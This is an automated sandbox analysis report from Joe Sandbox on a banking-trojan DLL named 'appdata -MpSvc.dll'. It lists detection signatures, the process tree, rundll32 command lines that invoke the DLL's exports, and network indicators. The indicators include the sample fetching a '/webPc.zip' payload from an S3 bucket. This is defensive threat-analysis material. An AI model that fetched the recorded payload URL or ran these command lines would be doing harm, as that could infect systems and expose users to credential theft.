Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
appdata -MpSvc.dll

Overview

General Information

Sample name:appdata -MpSvc.dll
Analysis ID:1405581
MD5:504356291f6139c3400cdd7842bc1406
SHA1:eaae969b5db3779fbb9a1bba694468b003822c77
SHA256:34a5017f3894d9d403fd2c5baa03d7bb6b9c28afb74e36010310af8f601602fb
Tags:bankerdll
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Found evasive API chain checking for user administrative privileges
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3692 cmdline: loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7032 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6564 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7232 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6456 cmdline: rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7384 cmdline: rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7472 cmdline: rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7524 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 2152 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7532 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7540 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7540 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7556 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 688 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7576 cmdline: rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: appdata -MpSvc.dllAvira: detected
Source: appdata -MpSvc.dllReversingLabs: Detection: 47%
Source: appdata -MpSvc.dllJoe Sandbox ML: detected
Source: appdata -MpSvc.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: unknownHTTPS traffic detected: 3.5.234.32:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4E5A4 FindFirstFileW,FindClose,4_2_04A4E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_04A4DFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043CE5A4 FindFirstFileW,FindClose,12_2_043CE5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043CDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,12_2_043CDFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_03FFE5A4 FindFirstFileW,FindClose,13_2_03FFE5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_03FFDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,13_2_03FFDFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0494E5A4 FindFirstFileW,FindClose,14_2_0494E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0494DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,14_2_0494DFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04D4E5A4 FindFirstFileW,FindClose,15_2_04D4E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04D4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,15_2_04D4DFD8

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.5.234.32 443Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /webPc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04605DCC Sleep,URLDownloadToFileW,Sleep,12_2_04605DCC
Source: global trafficHTTP traffic detected: GET /webPc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: K2HKDGME41DR45HNx-amz-id-2: vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCKQRQmubVkMWPewHm15YRYSdoTHyYBv1q62H1Rn2S3hhiPydHGYplaW7V0UmA6nContent-Type: application/xmlTransfer-Encoding: chunkedDate: Fri, 08 Mar 2024 18:51:55 GMTServer: AmazonS3Connection: close
Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exeString found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, appdata -MpSvc.dllString found in binary or memory: http://www.delphiforfun.org/openU
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/P
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip2xnL
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip4G
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zip94RM
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipk
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webPc.zipvx
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownHTTPS traffic detected: 3.5.234.32:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4CB044_2_04A4CB04
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_044E722012_2_044E7220
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_044E6F6012_2_044E6F60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043CCB0412_2_043CCB04
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0411722013_2_04117220
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_03FFCB0413_2_03FFCB04
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04116F6013_2_04116F60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0494CB0414_2_0494CB04
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04D4CB0415_2_04D4CB04
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: appdata -MpSvc.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: classification engineClassification label: mal72.evad.winDLL@26/16@1/1
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\Microsoft.NET\baseJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7540
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7524
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6564
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\7265f0ba-2a1a-4832-a4cd-94266d957b3eJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Source: appdata -MpSvc.dllReversingLabs: Detection: 47%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7540 -s 684
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 688
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 2152
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheckJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheckJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddrJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapperJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow found: window name: TMainFormJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: appdata -MpSvc.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: appdata -MpSvc.dllStatic file information: File size 26239902 > 1048576
Source: appdata -MpSvc.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24d400
Source: appdata -MpSvc.dllStatic PE information: More than 200 imports for user32.dll
Source: appdata -MpSvc.dllStatic PE information: section name: .didata
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50CB4 push ecx; mov dword ptr [esp], edx4_2_04A50CB5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50CCC push ecx; mov dword ptr [esp], edx4_2_04A50CCD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A7E5B4 push ecx; mov dword ptr [esp], eax4_2_04A7E5B5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50504 push ecx; mov dword ptr [esp], edx4_2_04A50505
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A66EF4 push ecx; mov dword ptr [esp], ecx4_2_04A66EF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A81198 push ecx; mov dword ptr [esp], eax4_2_04A81199
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04B152B4 push ecx; mov dword ptr [esp], edx4_2_04B152B5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A65A38 push ecx; mov dword ptr [esp], ecx4_2_04A65A3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A51270 push 04A512F3h; ret 4_2_04A512EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50BA0 push ecx; mov dword ptr [esp], edx4_2_04A50BA1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50BC2 push ecx; mov dword ptr [esp], edx4_2_04A50BC5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50B28 push ecx; mov dword ptr [esp], edx4_2_04A50B29
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50B34 push ecx; mov dword ptr [esp], edx4_2_04A50B35
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50B1C push ecx; mov dword ptr [esp], edx4_2_04A50B1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A47368 push ecx; mov dword ptr [esp], eax4_2_04A47369
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A50B7A push ecx; mov dword ptr [esp], edx4_2_04A50B7D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043D0504 push ecx; mov dword ptr [esp], edx12_2_043D0505
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043FE5B4 push ecx; mov dword ptr [esp], eax12_2_043FE5B5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_044BD588 push ecx; mov dword ptr [esp], eax12_2_044BD58A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04401198 push ecx; mov dword ptr [esp], eax12_2_04401199
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_044BD250 push ecx; mov dword ptr [esp], eax12_2_044BD254
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043D1270 push 043D12F3h; ret 12_2_043D12EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_044952B4 push ecx; mov dword ptr [esp], edx12_2_044952B5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043C7368 push ecx; mov dword ptr [esp], eax12_2_043C7369
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043D0CB4 push ecx; mov dword ptr [esp], edx12_2_043D0CB5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043D0CCC push ecx; mov dword ptr [esp], edx12_2_043D0CCD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043E6EF4 push ecx; mov dword ptr [esp], ecx12_2_043E6EF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043E6F30 push ecx; mov dword ptr [esp], ecx12_2_043E6F34
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_046058E8 push 0460592Eh; ret 12_2_04605926
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043E5A38 push ecx; mov dword ptr [esp], ecx12_2_043E5A3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043D0B34 push ecx; mov dword ptr [esp], edx12_2_043D0B35
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04C2A8FC IsIconic,4_2_04C2A8FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04C2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,4_2_04C2A980
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_045AA8FC IsIconic,12_2_045AA8FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_045AA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,12_2_045AA980
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_041DA8FC IsIconic,13_2_041DA8FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_041DA980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,13_2_041DA980
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04B2A8FC IsIconic,14_2_04B2A8FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04B2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,14_2_04B2A980
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F2A8FC IsIconic,15_2_04F2A8FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F2A980 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,15_2_04F2A980
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
